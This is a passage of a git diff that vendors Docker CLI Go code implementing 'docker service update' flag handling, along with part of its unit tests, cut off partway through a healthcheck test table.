runUpdate(dockerCli *command.DockerCli, flags *pflag.FlagSet, serviceID string) error { + apiClient := dockerCli.Client() + ctx := context.Background() + updateOpts := types.ServiceUpdateOptions{} + + service, _, err := apiClient.ServiceInspectWithRaw(ctx, serviceID) + if err != nil { + return err + } + + rollback, err := flags.GetBool("rollback") + if err != nil { + return err + } + + spec := &service.Spec + if rollback { + spec = service.PreviousSpec + if spec == nil { + return fmt.Errorf("service does not have a previous specification to roll back to") + } + } + + err = updateService(flags, spec) + if err != nil { + return err + } + + if flags.Changed("image") { + if err := resolveServiceImageDigest(dockerCli, spec); err != nil { + return err + } + } + + updatedSecrets, err := getUpdatedSecrets(apiClient, flags, spec.TaskTemplate.ContainerSpec.Secrets) + if err != nil { + return err + } + + spec.TaskTemplate.ContainerSpec.Secrets = updatedSecrets + + // only send auth if flag was set + sendAuth, err := flags.GetBool(flagRegistryAuth) + if err != nil { + return err + } + if sendAuth { + // Retrieve encoded auth token from the image reference + // This would be the old image if it didn't change in this update + image := spec.TaskTemplate.ContainerSpec.Image + encodedAuth, err := command.RetrieveAuthTokenFromImage(ctx, dockerCli, image) + if err != nil { + return err + } + updateOpts.EncodedRegistryAuth = encodedAuth + } else if rollback { + updateOpts.RegistryAuthFrom = types.RegistryAuthFromPreviousSpec + } else { + updateOpts.RegistryAuthFrom = types.RegistryAuthFromSpec + } + + response, err := apiClient.ServiceUpdate(ctx, service.ID, service.Version, *spec, updateOpts) + if err != nil { + return err + } + + for _, warning := range response.Warnings { + fmt.Fprintln(dockerCli.Err(), warning) + } + + fmt.Fprintf(dockerCli.Out(), "%s\n", serviceID) + return nil +} + +func updateService(flags *pflag.FlagSet, spec *swarm.ServiceSpec) error { + updateString := 
func(flag string, field *string) { + if flags.Changed(flag) { + *field, _ = flags.GetString(flag) + } + } + + updateInt64Value := func(flag string, field *int64) { + if flags.Changed(flag) { + *field = flags.Lookup(flag).Value.(int64Value).Value() + } + } + + updateFloatValue := func(flag string, field *float32) { + if flags.Changed(flag) { + *field = flags.Lookup(flag).Value.(*floatValue).Value() + } + } + + updateDuration := func(flag string, field *time.Duration) { + if flags.Changed(flag) { + *field, _ = flags.GetDuration(flag) + } + } + + updateDurationOpt := func(flag string, field **time.Duration) { + if flags.Changed(flag) { + val := *flags.Lookup(flag).Value.(*DurationOpt).Value() + *field = &val + } + } + + updateUint64 := func(flag string, field *uint64) { + if flags.Changed(flag) { + *field, _ = flags.GetUint64(flag) + } + } + + updateUint64Opt := func(flag string, field **uint64) { + if flags.Changed(flag) { + val := *flags.Lookup(flag).Value.(*Uint64Opt).Value() + *field = &val + } + } + + cspec := &spec.TaskTemplate.ContainerSpec + task := &spec.TaskTemplate + + taskResources := func() *swarm.ResourceRequirements { + if task.Resources == nil { + task.Resources = &swarm.ResourceRequirements{} + } + return task.Resources + } + + updateLabels(flags, &spec.Labels) + updateContainerLabels(flags, &cspec.Labels) + updateString("image", &cspec.Image) + updateStringToSlice(flags, "args", &cspec.Args) + updateEnvironment(flags, &cspec.Env) + updateString(flagWorkdir, &cspec.Dir) + updateString(flagUser, &cspec.User) + updateString(flagHostname, &cspec.Hostname) + if err := updateMounts(flags, &cspec.Mounts); err != nil { + return err + } + + if flags.Changed(flagLimitCPU) || flags.Changed(flagLimitMemory) { + taskResources().Limits = &swarm.Resources{} + updateInt64Value(flagLimitCPU, &task.Resources.Limits.NanoCPUs) + updateInt64Value(flagLimitMemory, &task.Resources.Limits.MemoryBytes) + } + if flags.Changed(flagReserveCPU) || 
flags.Changed(flagReserveMemory) { + taskResources().Reservations = &swarm.Resources{} + updateInt64Value(flagReserveCPU, &task.Resources.Reservations.NanoCPUs) + updateInt64Value(flagReserveMemory, &task.Resources.Reservations.MemoryBytes) + } + + updateDurationOpt(flagStopGracePeriod, &cspec.StopGracePeriod) + + if anyChanged(flags, flagRestartCondition, flagRestartDelay, flagRestartMaxAttempts, flagRestartWindow) { + if task.RestartPolicy == nil { + task.RestartPolicy = &swarm.RestartPolicy{} + } + + if flags.Changed(flagRestartCondition) { + value, _ := flags.GetString(flagRestartCondition) + task.RestartPolicy.Condition = swarm.RestartPolicyCondition(value) + } + updateDurationOpt(flagRestartDelay, &task.RestartPolicy.Delay) + updateUint64Opt(flagRestartMaxAttempts, &task.RestartPolicy.MaxAttempts) + updateDurationOpt(flagRestartWindow, &task.RestartPolicy.Window) + } + + if anyChanged(flags, flagConstraintAdd, flagConstraintRemove) { + if task.Placement == nil { + task.Placement = &swarm.Placement{} + } + updatePlacement(flags, task.Placement) + } + + if err := updateReplicas(flags, &spec.Mode); err != nil { + return err + } + + if anyChanged(flags, flagUpdateParallelism, flagUpdateDelay, flagUpdateMonitor, flagUpdateFailureAction, flagUpdateMaxFailureRatio) { + if spec.UpdateConfig == nil { + spec.UpdateConfig = &swarm.UpdateConfig{} + } + updateUint64(flagUpdateParallelism, &spec.UpdateConfig.Parallelism) + updateDuration(flagUpdateDelay, &spec.UpdateConfig.Delay) + updateDuration(flagUpdateMonitor, &spec.UpdateConfig.Monitor) + updateString(flagUpdateFailureAction, &spec.UpdateConfig.FailureAction) + updateFloatValue(flagUpdateMaxFailureRatio, &spec.UpdateConfig.MaxFailureRatio) + } + + if flags.Changed(flagEndpointMode) { + value, _ := flags.GetString(flagEndpointMode) + if spec.EndpointSpec == nil { + spec.EndpointSpec = &swarm.EndpointSpec{} + } + spec.EndpointSpec.Mode = swarm.ResolutionMode(value) + } + + if anyChanged(flags, flagGroupAdd, 
flagGroupRemove) { + if err := updateGroups(flags, &cspec.Groups); err != nil { + return err + } + } + + if anyChanged(flags, flagPublishAdd, flagPublishRemove) { + if spec.EndpointSpec == nil { + spec.EndpointSpec = &swarm.EndpointSpec{} + } + if err := updatePorts(flags, &spec.EndpointSpec.Ports); err != nil { + return err + } + } + + if anyChanged(flags, flagDNSAdd, flagDNSRemove, flagDNSOptionAdd, flagDNSOptionRemove, flagDNSSearchAdd, flagDNSSearchRemove) { + if cspec.DNSConfig == nil { + cspec.DNSConfig = &swarm.DNSConfig{} + } + if err := updateDNSConfig(flags, &cspec.DNSConfig); err != nil { + return err + } + } + + if anyChanged(flags, flagHostAdd, flagHostRemove) { + if err := updateHosts(flags, &cspec.Hosts); err != nil { + return err + } + } + + if err := updateLogDriver(flags, &spec.TaskTemplate); err != nil { + return err + } + + force, err := flags.GetBool("force") + if err != nil { + return err + } + + if force { + spec.TaskTemplate.ForceUpdate++ + } + + if err := updateHealthcheck(flags, cspec); err != nil { + return err + } + + if flags.Changed(flagTTY) { + tty, err := flags.GetBool(flagTTY) + if err != nil { + return err + } + cspec.TTY = tty + } + + return nil +} + +func updateStringToSlice(flags *pflag.FlagSet, flag string, field *[]string) error { + if !flags.Changed(flag) { + return nil + } + + value, _ := flags.GetString(flag) + valueSlice, err := shlex.Split(value) + *field = valueSlice + return err +} + +func anyChanged(flags *pflag.FlagSet, fields ...string) bool { + for _, flag := range fields { + if flags.Changed(flag) { + return true + } + } + return false +} + +func updatePlacement(flags *pflag.FlagSet, placement *swarm.Placement) { + if flags.Changed(flagConstraintAdd) { + values := flags.Lookup(flagConstraintAdd).Value.(*opts.ListOpts).GetAll() + placement.Constraints = append(placement.Constraints, values...) 
+ } + toRemove := buildToRemoveSet(flags, flagConstraintRemove) + + newConstraints := []string{} + for _, constraint := range placement.Constraints { + if _, exists := toRemove[constraint]; !exists { + newConstraints = append(newConstraints, constraint) + } + } + // Sort so that result is predictable. + sort.Strings(newConstraints) + + placement.Constraints = newConstraints +} + +func updateContainerLabels(flags *pflag.FlagSet, field *map[string]string) { + if flags.Changed(flagContainerLabelAdd) { + if *field == nil { + *field = map[string]string{} + } + + values := flags.Lookup(flagContainerLabelAdd).Value.(*opts.ListOpts).GetAll() + for key, value := range runconfigopts.ConvertKVStringsToMap(values) { + (*field)[key] = value + } + } + + if *field != nil && flags.Changed(flagContainerLabelRemove) { + toRemove := flags.Lookup(flagContainerLabelRemove).Value.(*opts.ListOpts).GetAll() + for _, label := range toRemove { + delete(*field, label) + } + } +} + +func updateLabels(flags *pflag.FlagSet, field *map[string]string) { + if flags.Changed(flagLabelAdd) { + if *field == nil { + *field = map[string]string{} + } + + values := flags.Lookup(flagLabelAdd).Value.(*opts.ListOpts).GetAll() + for key, value := range runconfigopts.ConvertKVStringsToMap(values) { + (*field)[key] = value + } + } + + if *field != nil && flags.Changed(flagLabelRemove) { + toRemove := flags.Lookup(flagLabelRemove).Value.(*opts.ListOpts).GetAll() + for _, label := range toRemove { + delete(*field, label) + } + } +} + +func updateEnvironment(flags *pflag.FlagSet, field *[]string) { + envSet := map[string]string{} + for _, v := range *field { + envSet[envKey(v)] = v + } + if flags.Changed(flagEnvAdd) { + value := flags.Lookup(flagEnvAdd).Value.(*opts.ListOpts) + for _, v := range value.GetAll() { + envSet[envKey(v)] = v + } + } + + *field = []string{} + for _, v := range envSet { + *field = append(*field, v) + } + + toRemove := buildToRemoveSet(flags, flagEnvRemove) + *field = removeItems(*field, 
toRemove, envKey) +} + +func getUpdatedSecrets(apiClient client.SecretAPIClient, flags *pflag.FlagSet, secrets []*swarm.SecretReference) ([]*swarm.SecretReference, error) { + if flags.Changed(flagSecretAdd) { + values := flags.Lookup(flagSecretAdd).Value.(*opts.SecretOpt).Value() + + addSecrets, err := ParseSecrets(apiClient, values) + if err != nil { + return nil, err + } + secrets = append(secrets, addSecrets...) + } + toRemove := buildToRemoveSet(flags, flagSecretRemove) + newSecrets := []*swarm.SecretReference{} + for _, secret := range secrets { + if _, exists := toRemove[secret.SecretName]; !exists { + newSecrets = append(newSecrets, secret) + } + } + + return newSecrets, nil +} + +func envKey(value string) string { + kv := strings.SplitN(value, "=", 2) + return kv[0] +} + +func itemKey(value string) string { + return value +} + +func buildToRemoveSet(flags *pflag.FlagSet, flag string) map[string]struct{} { + var empty struct{} + toRemove := make(map[string]struct{}) + + if !flags.Changed(flag) { + return toRemove + } + + toRemoveSlice := flags.Lookup(flag).Value.(*opts.ListOpts).GetAll() + for _, key := range toRemoveSlice { + toRemove[key] = empty + } + return toRemove +} + +func removeItems( + seq []string, + toRemove map[string]struct{}, + keyFunc func(string) string, +) []string { + newSeq := []string{} + for _, item := range seq { + if _, exists := toRemove[keyFunc(item)]; !exists { + newSeq = append(newSeq, item) + } + } + return newSeq +} + +type byMountSource []mounttypes.Mount + +func (m byMountSource) Len() int { return len(m) } +func (m byMountSource) Swap(i, j int) { m[i], m[j] = m[j], m[i] } +func (m byMountSource) Less(i, j int) bool { + a, b := m[i], m[j] + + if a.Source == b.Source { + return a.Target < b.Target + } + + return a.Source < b.Source +} + +func updateMounts(flags *pflag.FlagSet, mounts *[]mounttypes.Mount) error { + + mountsByTarget := map[string]mounttypes.Mount{} + + if flags.Changed(flagMountAdd) { + values := 
flags.Lookup(flagMountAdd).Value.(*opts.MountOpt).Value() + for _, mount := range values { + if _, ok := mountsByTarget[mount.Target]; ok { + return fmt.Errorf("duplicate mount target") + } + mountsByTarget[mount.Target] = mount + } + } + + // Add old list of mount points minus updated one. + for _, mount := range *mounts { + if _, ok := mountsByTarget[mount.Target]; !ok { + mountsByTarget[mount.Target] = mount + } + } + + newMounts := []mounttypes.Mount{} + + toRemove := buildToRemoveSet(flags, flagMountRemove) + + for _, mount := range mountsByTarget { + if _, exists := toRemove[mount.Target]; !exists { + newMounts = append(newMounts, mount) + } + } + sort.Sort(byMountSource(newMounts)) + *mounts = newMounts + return nil +} + +func updateGroups(flags *pflag.FlagSet, groups *[]string) error { + if flags.Changed(flagGroupAdd) { + values := flags.Lookup(flagGroupAdd).Value.(*opts.ListOpts).GetAll() + *groups = append(*groups, values...) + } + toRemove := buildToRemoveSet(flags, flagGroupRemove) + + newGroups := []string{} + for _, group := range *groups { + if _, exists := toRemove[group]; !exists { + newGroups = append(newGroups, group) + } + } + // Sort so that result is predictable. + sort.Strings(newGroups) + + *groups = newGroups + return nil +} + +func removeDuplicates(entries []string) []string { + hit := map[string]bool{} + newEntries := []string{} + for _, v := range entries { + if !hit[v] { + newEntries = append(newEntries, v) + hit[v] = true + } + } + return newEntries +} + +func updateDNSConfig(flags *pflag.FlagSet, config **swarm.DNSConfig) error { + newConfig := &swarm.DNSConfig{} + + nameservers := (*config).Nameservers + if flags.Changed(flagDNSAdd) { + values := flags.Lookup(flagDNSAdd).Value.(*opts.ListOpts).GetAll() + nameservers = append(nameservers, values...) 
+ } + nameservers = removeDuplicates(nameservers) + toRemove := buildToRemoveSet(flags, flagDNSRemove) + for _, nameserver := range nameservers { + if _, exists := toRemove[nameserver]; !exists { + newConfig.Nameservers = append(newConfig.Nameservers, nameserver) + + } + } + // Sort so that result is predictable. + sort.Strings(newConfig.Nameservers) + + search := (*config).Search + if flags.Changed(flagDNSSearchAdd) { + values := flags.Lookup(flagDNSSearchAdd).Value.(*opts.ListOpts).GetAll() + search = append(search, values...) + } + search = removeDuplicates(search) + toRemove = buildToRemoveSet(flags, flagDNSSearchRemove) + for _, entry := range search { + if _, exists := toRemove[entry]; !exists { + newConfig.Search = append(newConfig.Search, entry) + } + } + // Sort so that result is predictable. + sort.Strings(newConfig.Search) + + options := (*config).Options + if flags.Changed(flagDNSOptionAdd) { + values := flags.Lookup(flagDNSOptionAdd).Value.(*opts.ListOpts).GetAll() + options = append(options, values...) + } + options = removeDuplicates(options) + toRemove = buildToRemoveSet(flags, flagDNSOptionRemove) + for _, option := range options { + if _, exists := toRemove[option]; !exists { + newConfig.Options = append(newConfig.Options, option) + } + } + // Sort so that result is predictable. 
+ sort.Strings(newConfig.Options) + + *config = newConfig + return nil +} + +type byPortConfig []swarm.PortConfig + +func (r byPortConfig) Len() int { return len(r) } +func (r byPortConfig) Swap(i, j int) { r[i], r[j] = r[j], r[i] } +func (r byPortConfig) Less(i, j int) bool { + // We convert PortConfig into `port/protocol`, e.g., `80/tcp` + // In updatePorts we already filter out with map so there is duplicate entries + return portConfigToString(&r[i]) < portConfigToString(&r[j]) +} + +func portConfigToString(portConfig *swarm.PortConfig) string { + protocol := portConfig.Protocol + mode := portConfig.PublishMode + return fmt.Sprintf("%v:%v/%s/%s", portConfig.PublishedPort, portConfig.TargetPort, protocol, mode) +} + +// FIXME(vdemeester) port to opts.PortOpt +// This validation is only used for `--publish-rm`. +// The `--publish-rm` takes: +// [/] (e.g., 80, 80/tcp, 53/udp) +func validatePublishRemove(val string) (string, error) { + proto, port := nat.SplitProtoPort(val) + if proto != "tcp" && proto != "udp" { + return "", fmt.Errorf("invalid protocol '%s' for %s", proto, val) + } + if strings.Contains(port, ":") { + return "", fmt.Errorf("invalid port format: '%s', should be [/] (e.g., 80, 80/tcp, 53/udp)", port) + } + if _, err := nat.ParsePort(port); err != nil { + return "", err + } + return val, nil +} + +func updatePorts(flags *pflag.FlagSet, portConfig *[]swarm.PortConfig) error { + // The key of the map is `port/protocol`, e.g., `80/tcp` + portSet := map[string]swarm.PortConfig{} + + // Build the current list of portConfig + for _, entry := range *portConfig { + if _, ok := portSet[portConfigToString(&entry)]; !ok { + portSet[portConfigToString(&entry)] = entry + } + } + + newPorts := []swarm.PortConfig{} + + // Clean current ports + toRemove := flags.Lookup(flagPublishRemove).Value.(*opts.PortOpt).Value() +portLoop: + for _, port := range portSet { + for _, pConfig := range toRemove { + if equalProtocol(port.Protocol, pConfig.Protocol) && + 
port.TargetPort == pConfig.TargetPort && + equalPublishMode(port.PublishMode, pConfig.PublishMode) { + continue portLoop + } + } + + newPorts = append(newPorts, port) + } + + // Check to see if there are any conflict in flags. + if flags.Changed(flagPublishAdd) { + ports := flags.Lookup(flagPublishAdd).Value.(*opts.PortOpt).Value() + + for _, port := range ports { + if v, ok := portSet[portConfigToString(&port)]; ok { + if v != port { + fmt.Println("v", v) + return fmt.Errorf("conflicting port mapping between %v:%v/%s and %v:%v/%s", port.PublishedPort, port.TargetPort, port.Protocol, v.PublishedPort, v.TargetPort, v.Protocol) + } + continue + } + //portSet[portConfigToString(&port)] = port + newPorts = append(newPorts, port) + } + } + + // Sort the PortConfig to avoid unnecessary updates + sort.Sort(byPortConfig(newPorts)) + *portConfig = newPorts + return nil +} + +func equalProtocol(prot1, prot2 swarm.PortConfigProtocol) bool { + return prot1 == prot2 || + (prot1 == swarm.PortConfigProtocol("") && prot2 == swarm.PortConfigProtocolTCP) || + (prot2 == swarm.PortConfigProtocol("") && prot1 == swarm.PortConfigProtocolTCP) +} + +func equalPublishMode(mode1, mode2 swarm.PortConfigPublishMode) bool { + return mode1 == mode2 || + (mode1 == swarm.PortConfigPublishMode("") && mode2 == swarm.PortConfigPublishModeIngress) || + (mode2 == swarm.PortConfigPublishMode("") && mode1 == swarm.PortConfigPublishModeIngress) +} + +func equalPort(targetPort nat.Port, port swarm.PortConfig) bool { + return (string(port.Protocol) == targetPort.Proto() && + port.TargetPort == uint32(targetPort.Int())) +} + +func updateReplicas(flags *pflag.FlagSet, serviceMode *swarm.ServiceMode) error { + if !flags.Changed(flagReplicas) { + return nil + } + + if serviceMode == nil || serviceMode.Replicated == nil { + return fmt.Errorf("replicas can only be used with replicated mode") + } + serviceMode.Replicated.Replicas = flags.Lookup(flagReplicas).Value.(*Uint64Opt).Value() + return nil +} + +func 
updateHosts(flags *pflag.FlagSet, hosts *[]string) error { + // Combine existing Hosts (in swarmkit format) with the host to add (convert to swarmkit format) + if flags.Changed(flagHostAdd) { + values := convertExtraHostsToSwarmHosts(flags.Lookup(flagHostAdd).Value.(*opts.ListOpts).GetAll()) + *hosts = append(*hosts, values...) + } + // Remove duplicate + *hosts = removeDuplicates(*hosts) + + keysToRemove := make(map[string]struct{}) + if flags.Changed(flagHostRemove) { + var empty struct{} + extraHostsToRemove := flags.Lookup(flagHostRemove).Value.(*opts.ListOpts).GetAll() + for _, entry := range extraHostsToRemove { + key := strings.SplitN(entry, ":", 2)[0] + keysToRemove[key] = empty + } + } + + newHosts := []string{} + for _, entry := range *hosts { + // Since this is in swarmkit format, we need to find the key, which is canonical_hostname of: + // IP_address canonical_hostname [aliases...] + parts := strings.Fields(entry) + if len(parts) > 1 { + key := parts[1] + if _, exists := keysToRemove[key]; !exists { + newHosts = append(newHosts, entry) + } + } else { + newHosts = append(newHosts, entry) + } + } + + // Sort so that result is predictable. + sort.Strings(newHosts) + + *hosts = newHosts + return nil +} + +// updateLogDriver updates the log driver only if the log driver flag is set. +// All options will be replaced with those provided on the command line. 
+func updateLogDriver(flags *pflag.FlagSet, taskTemplate *swarm.TaskSpec) error { + if !flags.Changed(flagLogDriver) { + return nil + } + + name, err := flags.GetString(flagLogDriver) + if err != nil { + return err + } + + if name == "" { + return nil + } + + taskTemplate.LogDriver = &swarm.Driver{ + Name: name, + Options: runconfigopts.ConvertKVStringsToMap(flags.Lookup(flagLogOpt).Value.(*opts.ListOpts).GetAll()), + } + + return nil +} + +func updateHealthcheck(flags *pflag.FlagSet, containerSpec *swarm.ContainerSpec) error { + if !anyChanged(flags, flagNoHealthcheck, flagHealthCmd, flagHealthInterval, flagHealthRetries, flagHealthTimeout) { + return nil + } + if containerSpec.Healthcheck == nil { + containerSpec.Healthcheck = &container.HealthConfig{} + } + noHealthcheck, err := flags.GetBool(flagNoHealthcheck) + if err != nil { + return err + } + if noHealthcheck { + if !anyChanged(flags, flagHealthCmd, flagHealthInterval, flagHealthRetries, flagHealthTimeout) { + containerSpec.Healthcheck = &container.HealthConfig{ + Test: []string{"NONE"}, + } + return nil + } + return fmt.Errorf("--%s conflicts with --health-* options", flagNoHealthcheck) + } + if len(containerSpec.Healthcheck.Test) > 0 && containerSpec.Healthcheck.Test[0] == "NONE" { + containerSpec.Healthcheck.Test = nil + } + if flags.Changed(flagHealthInterval) { + val := *flags.Lookup(flagHealthInterval).Value.(*PositiveDurationOpt).Value() + containerSpec.Healthcheck.Interval = val + } + if flags.Changed(flagHealthTimeout) { + val := *flags.Lookup(flagHealthTimeout).Value.(*PositiveDurationOpt).Value() + containerSpec.Healthcheck.Timeout = val + } + if flags.Changed(flagHealthRetries) { + containerSpec.Healthcheck.Retries, _ = flags.GetInt(flagHealthRetries) + } + if flags.Changed(flagHealthCmd) { + cmd, _ := flags.GetString(flagHealthCmd) + if cmd != "" { + containerSpec.Healthcheck.Test = []string{"CMD-SHELL", cmd} + } else { + containerSpec.Healthcheck.Test = nil + } + } + return nil +} diff --git 
a/vendor/github.com/docker/docker/cli/command/service/update_test.go b/vendor/github.com/docker/docker/cli/command/service/update_test.go new file mode 100644 index 0000000000..08fe248769 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/service/update_test.go @@ -0,0 +1,384 @@ +package service + +import ( + "reflect" + "sort" + "testing" + "time" + + "github.com/docker/docker/api/types/container" + mounttypes "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/pkg/testutil/assert" +) + +func TestUpdateServiceArgs(t *testing.T) { + flags := newUpdateCommand(nil).Flags() + flags.Set("args", "the \"new args\"") + + spec := &swarm.ServiceSpec{} + cspec := &spec.TaskTemplate.ContainerSpec + cspec.Args = []string{"old", "args"} + + updateService(flags, spec) + assert.EqualStringSlice(t, cspec.Args, []string{"the", "new args"}) +} + +func TestUpdateLabels(t *testing.T) { + flags := newUpdateCommand(nil).Flags() + flags.Set("label-add", "toadd=newlabel") + flags.Set("label-rm", "toremove") + + labels := map[string]string{ + "toremove": "thelabeltoremove", + "tokeep": "value", + } + + updateLabels(flags, &labels) + assert.Equal(t, len(labels), 2) + assert.Equal(t, labels["tokeep"], "value") + assert.Equal(t, labels["toadd"], "newlabel") +} + +func TestUpdateLabelsRemoveALabelThatDoesNotExist(t *testing.T) { + flags := newUpdateCommand(nil).Flags() + flags.Set("label-rm", "dne") + + labels := map[string]string{"foo": "theoldlabel"} + updateLabels(flags, &labels) + assert.Equal(t, len(labels), 1) +} + +func TestUpdatePlacement(t *testing.T) { + flags := newUpdateCommand(nil).Flags() + flags.Set("constraint-add", "node=toadd") + flags.Set("constraint-rm", "node!=toremove") + + placement := &swarm.Placement{ + Constraints: []string{"node!=toremove", "container=tokeep"}, + } + + updatePlacement(flags, placement) + assert.Equal(t, len(placement.Constraints), 2) + assert.Equal(t, 
placement.Constraints[0], "container=tokeep") + assert.Equal(t, placement.Constraints[1], "node=toadd") +} + +func TestUpdateEnvironment(t *testing.T) { + flags := newUpdateCommand(nil).Flags() + flags.Set("env-add", "toadd=newenv") + flags.Set("env-rm", "toremove") + + envs := []string{"toremove=theenvtoremove", "tokeep=value"} + + updateEnvironment(flags, &envs) + assert.Equal(t, len(envs), 2) + // Order has been removed in updateEnvironment (map) + sort.Strings(envs) + assert.Equal(t, envs[0], "toadd=newenv") + assert.Equal(t, envs[1], "tokeep=value") +} + +func TestUpdateEnvironmentWithDuplicateValues(t *testing.T) { + flags := newUpdateCommand(nil).Flags() + flags.Set("env-add", "foo=newenv") + flags.Set("env-add", "foo=dupe") + flags.Set("env-rm", "foo") + + envs := []string{"foo=value"} + + updateEnvironment(flags, &envs) + assert.Equal(t, len(envs), 0) +} + +func TestUpdateEnvironmentWithDuplicateKeys(t *testing.T) { + // Test case for #25404 + flags := newUpdateCommand(nil).Flags() + flags.Set("env-add", "A=b") + + envs := []string{"A=c"} + + updateEnvironment(flags, &envs) + assert.Equal(t, len(envs), 1) + assert.Equal(t, envs[0], "A=b") +} + +func TestUpdateGroups(t *testing.T) { + flags := newUpdateCommand(nil).Flags() + flags.Set("group-add", "wheel") + flags.Set("group-add", "docker") + flags.Set("group-rm", "root") + flags.Set("group-add", "foo") + flags.Set("group-rm", "docker") + + groups := []string{"bar", "root"} + + updateGroups(flags, &groups) + assert.Equal(t, len(groups), 3) + assert.Equal(t, groups[0], "bar") + assert.Equal(t, groups[1], "foo") + assert.Equal(t, groups[2], "wheel") +} + +func TestUpdateDNSConfig(t *testing.T) { + flags := newUpdateCommand(nil).Flags() + + // IPv4, with duplicates + flags.Set("dns-add", "1.1.1.1") + flags.Set("dns-add", "1.1.1.1") + flags.Set("dns-add", "2.2.2.2") + flags.Set("dns-rm", "3.3.3.3") + flags.Set("dns-rm", "2.2.2.2") + // IPv6 + flags.Set("dns-add", "2001:db8:abc8::1") + // Invalid dns record + 
assert.Error(t, flags.Set("dns-add", "x.y.z.w"), "x.y.z.w is not an ip address") + + // domains with duplicates + flags.Set("dns-search-add", "example.com") + flags.Set("dns-search-add", "example.com") + flags.Set("dns-search-add", "example.org") + flags.Set("dns-search-rm", "example.org") + // Invalid dns search domain + assert.Error(t, flags.Set("dns-search-add", "example$com"), "example$com is not a valid domain") + + flags.Set("dns-option-add", "ndots:9") + flags.Set("dns-option-rm", "timeout:3") + + config := &swarm.DNSConfig{ + Nameservers: []string{"3.3.3.3", "5.5.5.5"}, + Search: []string{"localdomain"}, + Options: []string{"timeout:3"}, + } + + updateDNSConfig(flags, &config) + + assert.Equal(t, len(config.Nameservers), 3) + assert.Equal(t, config.Nameservers[0], "1.1.1.1") + assert.Equal(t, config.Nameservers[1], "2001:db8:abc8::1") + assert.Equal(t, config.Nameservers[2], "5.5.5.5") + + assert.Equal(t, len(config.Search), 2) + assert.Equal(t, config.Search[0], "example.com") + assert.Equal(t, config.Search[1], "localdomain") + + assert.Equal(t, len(config.Options), 1) + assert.Equal(t, config.Options[0], "ndots:9") +} + +func TestUpdateMounts(t *testing.T) { + flags := newUpdateCommand(nil).Flags() + flags.Set("mount-add", "type=volume,source=vol2,target=/toadd") + flags.Set("mount-rm", "/toremove") + + mounts := []mounttypes.Mount{ + {Target: "/toremove", Source: "vol1", Type: mounttypes.TypeBind}, + {Target: "/tokeep", Source: "vol3", Type: mounttypes.TypeBind}, + } + + updateMounts(flags, &mounts) + assert.Equal(t, len(mounts), 2) + assert.Equal(t, mounts[0].Target, "/toadd") + assert.Equal(t, mounts[1].Target, "/tokeep") + +} + +func TestUpdateMountsWithDuplicateMounts(t *testing.T) { + flags := newUpdateCommand(nil).Flags() + flags.Set("mount-add", "type=volume,source=vol4,target=/toadd") + + mounts := []mounttypes.Mount{ + {Target: "/tokeep1", Source: "vol1", Type: mounttypes.TypeBind}, + {Target: "/toadd", Source: "vol2", Type: 
mounttypes.TypeBind}, + {Target: "/tokeep2", Source: "vol3", Type: mounttypes.TypeBind}, + } + + updateMounts(flags, &mounts) + assert.Equal(t, len(mounts), 3) + assert.Equal(t, mounts[0].Target, "/tokeep1") + assert.Equal(t, mounts[1].Target, "/tokeep2") + assert.Equal(t, mounts[2].Target, "/toadd") +} + +func TestUpdatePorts(t *testing.T) { + flags := newUpdateCommand(nil).Flags() + flags.Set("publish-add", "1000:1000") + flags.Set("publish-rm", "333/udp") + + portConfigs := []swarm.PortConfig{ + {TargetPort: 333, Protocol: swarm.PortConfigProtocolUDP}, + {TargetPort: 555}, + } + + err := updatePorts(flags, &portConfigs) + assert.Equal(t, err, nil) + assert.Equal(t, len(portConfigs), 2) + // Do a sort to have the order (might have changed by map) + targetPorts := []int{int(portConfigs[0].TargetPort), int(portConfigs[1].TargetPort)} + sort.Ints(targetPorts) + assert.Equal(t, targetPorts[0], 555) + assert.Equal(t, targetPorts[1], 1000) +} + +func TestUpdatePortsDuplicate(t *testing.T) { + // Test case for #25375 + flags := newUpdateCommand(nil).Flags() + flags.Set("publish-add", "80:80") + + portConfigs := []swarm.PortConfig{ + { + TargetPort: 80, + PublishedPort: 80, + Protocol: swarm.PortConfigProtocolTCP, + PublishMode: swarm.PortConfigPublishModeIngress, + }, + } + + err := updatePorts(flags, &portConfigs) + assert.Equal(t, err, nil) + assert.Equal(t, len(portConfigs), 1) + assert.Equal(t, portConfigs[0].TargetPort, uint32(80)) +} + +func TestUpdateHealthcheckTable(t *testing.T) { + type test struct { + flags [][2]string + initial *container.HealthConfig + expected *container.HealthConfig + err string + } + testCases := []test{ + { + flags: [][2]string{{"no-healthcheck", "true"}}, + initial: &container.HealthConfig{Test: []string{"CMD-SHELL", "cmd1"}, Retries: 10}, + expected: &container.HealthConfig{Test: []string{"NONE"}}, + }, + { + flags: [][2]string{{"health-cmd", "cmd1"}}, + initial: &container.HealthConfig{Test: []string{"NONE"}}, + expected: 
&container.HealthConfig{Test: []string{"CMD-SHELL", "cmd1"}}, + }, + { + flags: [][2]string{{"health-retries", "10"}}, + initial: &container.HealthConfig{Test: []string{"NONE"}}, + expected: &container.HealthConfig{Retries: 10}, + }, + { + flags: [][2]string{{"health-retries", "10"}}, + initial: &container.HealthConfig{Test: []string{"CMD", "cmd1"}}, + expected: &container.HealthConfig{Test: []string{"CMD", "cmd1"}, Retries: 10}, + }, + { + flags: [][2]string{{"health-interval", "1m"}}, + initial: &container.HealthConfig{Test: []string{"CMD", "cmd1"}}, + expected: &container.HealthConfig{Test: []string{"CMD", "cmd1"}, Interval: time.Minute}, + }, + { + flags: [][2]string{{"health-cmd", ""}}, + initial: &container.HealthConfig{Test: []string{"CMD", "cmd1"}, Retries: 10}, + expected: &container.HealthConfig{Retries: 10}, + }, + { + flags: [][2]string{{"health-retries", "0"}}, + initial: &container.HealthConfig{Test: []string{"CMD", "cmd1"}, Retries: 10}, + expected: &container.HealthConfig{Test: []string{"CMD", "cmd1"}}, + }, + { + flags: [][2]string{{"health-cmd", "cmd1"}, {"no-healthcheck", "true"}}, + err: "--no-healthcheck conflicts with --health-* options", + }, + { + flags: [][2]string{{"health-interval", "10m"}, {"no-healthcheck", "true"}}, + err: "--no-healthcheck conflicts with --health-* options", + }, + { + flags: [][2]string{{"health-timeout", "1m"}, {"no-healthcheck", "true"}}, + err: "--no-healthcheck conflicts with --health-* options", + }, + } + for i, c := range testCases { + flags := newUpdateCommand(nil).Flags() + for _, flag := range c.flags { + flags.Set(flag[0], flag[1]) + } + cspec := &swarm.ContainerSpec{ + Healthcheck: c.initial, + } + err := 